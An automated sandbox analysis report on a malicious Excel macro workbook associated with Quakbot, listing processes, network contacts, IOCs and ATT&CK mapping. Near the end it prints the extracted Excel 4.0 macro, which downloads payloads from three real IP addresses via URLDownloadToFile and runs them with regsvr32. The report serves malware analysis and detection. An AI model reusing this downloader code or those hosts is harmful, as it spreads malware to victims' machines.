
Windows Analysis Report Permission-1984690372-06252021.xlsm

Overview

General Information

Sample Name: Permission-1984690372-06252021.xlsm
Analysis ID: 440652
MD5: f9272d851155983c3326ae7bcd99e489
SHA1: caaa6700907da09efc9d7831ec9a0dc636bdbe74
SHA256: 80a312be7e3162e80ef38492e7c2160af88e1482fb80ea3370761a0c0654478d

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2624 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2180 cmdline: regsvr32 ..\Kro.fis MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2176 cmdline: regsvr32 ..\Kro.fis1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2364 cmdline: regsvr32 ..\Kro.fis2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  • Command: regsvr32 ..\Kro.fis
  • CommandLine: regsvr32 ..\Kro.fis
  • CommandLine|base64offset|contains: ,
  • Image: C:\Windows\System32\regsvr32.exe
  • NewProcessName: C:\Windows\System32\regsvr32.exe
  • OriginalFileName: C:\Windows\System32\regsvr32.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 2624
  • ProcessCommandLine: regsvr32 ..\Kro.fis
  • ProcessId: 2180

Signature Overview

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 190.14.37.3:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 185.240.103.219:80
Source: global traffic | HTTP traffic detected: GET /44372.7698814815.dat HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 190.14.37.3 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /44372.7698814815.dat HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 185.183.99.120 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknown | TCP traffic detected without corresponding DNS query: 185.183.99.120
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94954BDE.jpg
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2146358478.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126668490.0000000001CB0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing from the 19 ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from th
Source: Screenshot number: 4 | Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A . A m EC
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing from the ' yellow bar above. 21 22 G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 30 31 32 33 ) CI O 34 35 36 37 38 , Id 1 p pi Sheetl tj i q |"1 P A _ Savi
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulas
Source: Permission-1984690372-06252021.xlsm | Initial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Permission-1984690372-06252021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC3AC.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Permission-1984690372-06252021.xlsm | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-1984690372-06252021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-1984690372-06252021.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 2028 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2340 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2320 | Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

Techniques listed per tactic; numbers in parentheses are the matrix's per-technique counts.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Scripting (1); Exploitation for Client Execution (22); At (Linux); At (Windows); Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (1); Process Injection (1); Scripting (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Virtualization/Sandbox Evasion (1); File and Directory Discovery (1); System Information Discovery (2); System Network Configuration Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (11); Ingress Tool Transfer (2); Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Impact: Modify System Partition; Device Lockout; Delete Device Data

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Permission-1984690372-06252021.xlsm | 4% | ReversingLabs | Document-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://190.14.37.3/44372.7698814815.dat | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://185.183.99.120/44372.7698814815.dat | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://190.14.37.3/44372.7698814815.dat | false | Avira URL Cloud: safe | unknown
http://185.183.99.120/44372.7698814815.dat | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com/ | regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | false | - | high
http://www.%s.comPA | regsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmp | false | - | high
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2146358478.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126668490.0000000001CB0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
190.14.37.3 | unknown | Panama | 52469 | OffshoreRacksSAPA | false
185.183.99.120 | unknown | Netherlands | 60117 | HSAE | false
185.240.103.219 | unknown | Russian Federation | 57724 | DDOS-GUARDRU | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 440652
Start date: 25.06.2021
Start time: 18:27:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 57s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Permission-1984690372-06252021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.expl.evad.winXLSM@7/7@0/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Found warning dialog
  • Click Ok
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/440652/sample/Permission-1984690372-06252021.xlsm

Simulations

Behavior and APIs

Time | Type | Description
18:28:50 | API Interceptor | 3x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
190.14.37.3 | Permission-1532161794-06252021.xlsm | malicious | 190.14.37.3/44372.7671056713.dat
190.14.37.3 | Permission-414467145-06252021.xlsm | malicious | 190.14.37.3/44372.593127662.dat
190.14.37.3 | Permission-414467145-06252021.xlsm | malicious | 190.14.37.3/44372.5879460648.dat
185.183.99.120 | Permission-1532161794-06252021.xlsm | malicious | 185.183.99.120/44372.7671056713.dat
185.183.99.120 | Permission-414467145-06252021.xlsm | malicious | 185.183.99.120/44372.593127662.dat
185.183.99.120 | Permission-414467145-06252021.xlsm | malicious | 185.183.99.120/44372.5879460648.dat
185.240.103.219 | Permission-414467145-06252021.xlsm | malicious | 185.240.103.219/44372.593127662.dat
185.240.103.219 | Permission-414467145-06252021.xlsm | malicious | 185.240.103.219/44372.5879460648.dat

Domains

No context

                • 185.198.57.204
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94954BDE.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                Category:dropped
                Size (bytes):139381
                Entropy (8bit):7.677272725029824
                Encrypted:false
                SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                MD5:53918FB868F1540920FC189C6783FC7C
                SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Local\Temp\EBCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664539669110037
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4U3:cng4P4346PgZw9gQak
                MD5:6AA2E8DD7F57C5DE42A823C00C5DCB36
                SHA1:A0334ABC59C4A2895B71720996F1E5FDFB673004
                SHA-256:A6E8B5DF4BE3297072D51B198CBA6B8B047A43136A953DE8443AD5749E826A8B
                SHA-512:3405DCE72DA172ED110D661167E3A853CBF3443D820392304E47895064B5BD982799BAE9AF6FC76B6C42BCDE3CDC93F715105E9F82FCB9621977387C868A8881
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Jun 26 00:28:37 2021, atime=Sat Jun 26 00:28:37 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.471010949234031
                Encrypted:false
                SSDEEP:12:85QCELgXg/XAlCPCHaXgzB8IB/mxRlvX+WnicvbVbDtZ3YilMMEpxRljKVTdJP9O:85hy/XTwz6I0DxYeFDv3q8rNru/
                MD5:7F845914F5AAA336F23545CE948F7659
                SHA1:1AF9A317EC16CC38031824466A4F0E2504447F91
                SHA-256:73E53ED1F83AC7ADBBA9F958BF521711349CF35CF783CA312F243F91A4A62493
                SHA-512:79BC2B3D32104CA3E65B750286C39F68D62F36D1921066FE22626B0709D4085F7D4B39BCC858AFF94CDFE97E4588E3D2B0AA2B9371DC1558977375096A1D1EFF
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-1984690372-06252021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sat Jun 26 00:28:37 2021, atime=Sat Jun 26 00:28:37 2021, length=153117, window=hide
                Category:dropped
                Size (bytes):2238
                Entropy (8bit):4.5303789406700306
                Encrypted:false
                SSDEEP:48:8Rk/XT3IkK2wDJ962w88Qh2Rk/XT3IkK2wDJ962w88Q/:8Rk/XLIkgR8Qh2Rk/XLIkgR8Q/
                MD5:65F3F046100DC5C6A6B7C061A76A39A6
                SHA1:4E7715EFEF4DBFA2A1757BC88B9411D8BE1917D5
                SHA-256:4325ED557385E7711E82ECDFDA184F3FC903C5CB13D111DCF0072C3C5C458E96
                SHA-512:D002BAF7255B39908208F9AE84A4BE9CFB1CF4D75F27E5FFDB9963E38B53AF36A6FC30C0F76A38B042058E54FEF7BC2487255049BCC26FD11170C5F19206AA3F
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):145
                Entropy (8bit):4.777412663289588
                Encrypted:false
                SSDEEP:3:oyBVomxW+Lxz5XQ8UltLxz5XQ8UlmxW+Lxz5XQ8Ulv:djHz5AZ/Fz5AZaz5AZ1
                MD5:6D8FB5FDA4AB751BD06AD0503EEEDE2B
                SHA1:D1FAA288305EB17300E14947E3A7849589D6F70B
                SHA-256:67627E5AFA83D27D4399C77D411684204CF1C9532A101A8F1FF9AA85723097BB
                SHA-512:057588ACE7096CF408DAB9A14886F0A4CAAED80E71E7960AF74AEF5127AD7B04244D62D5CBB2823129F38BC8BE42569154EC1BC5EF1867C93FCCDC3E2D683A71
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Permission-1984690372-06252021.LNK=0..Permission-1984690372-06252021.LNK=0..[misc]..Permission-1984690372-06252021.LNK=0..
                C:\Users\user\Desktop\7CCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664539669110037
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4U3:cng4P4346PgZw9gQak
                MD5:6AA2E8DD7F57C5DE42A823C00C5DCB36
                SHA1:A0334ABC59C4A2895B71720996F1E5FDFB673004
                SHA-256:A6E8B5DF4BE3297072D51B198CBA6B8B047A43136A953DE8443AD5749E826A8B
                SHA-512:3405DCE72DA172ED110D661167E3A853CBF3443D820392304E47895064B5BD982799BAE9AF6FC76B6C42BCDE3CDC93F715105E9F82FCB9621977387C868A8881
                Malicious:false
                Reputation:low
                C:\Users\user\Desktop\~$Permission-1984690372-06252021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.666395274852154
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Permission-1984690372-06252021.xlsm
                File size:153750
                MD5:f9272d851155983c3326ae7bcd99e489
                SHA1:caaa6700907da09efc9d7831ec9a0dc636bdbe74
                SHA256:80a312be7e3162e80ef38492e7c2160af88e1482fb80ea3370761a0c0654478d
                SHA512:3e8d912568a35cc56af075b26f939b08bc5bd3ec0163e4a63c8cb563dcb85c74e7ad6ff9a5e5f457cda57af9edcec724dabda3ac32d89e9409b5c669096d037f
                SSDEEP:3072:mmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:d4P4346PgZw9gQaVJ

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Permission-1984690372-06252021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),
                =EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

                Network Behavior

                Snort IDS Alerts

                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                06/25/21-18:28:50.560988 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 190.14.37.3 | 192.168.2.22
                06/25/21-18:28:50.962858 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49170 | 185.183.99.120 | 192.168.2.22

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jun 25, 2021 18:28:46.983198881 CEST | 49167 | 80 | 192.168.2.22 | 185.240.103.219
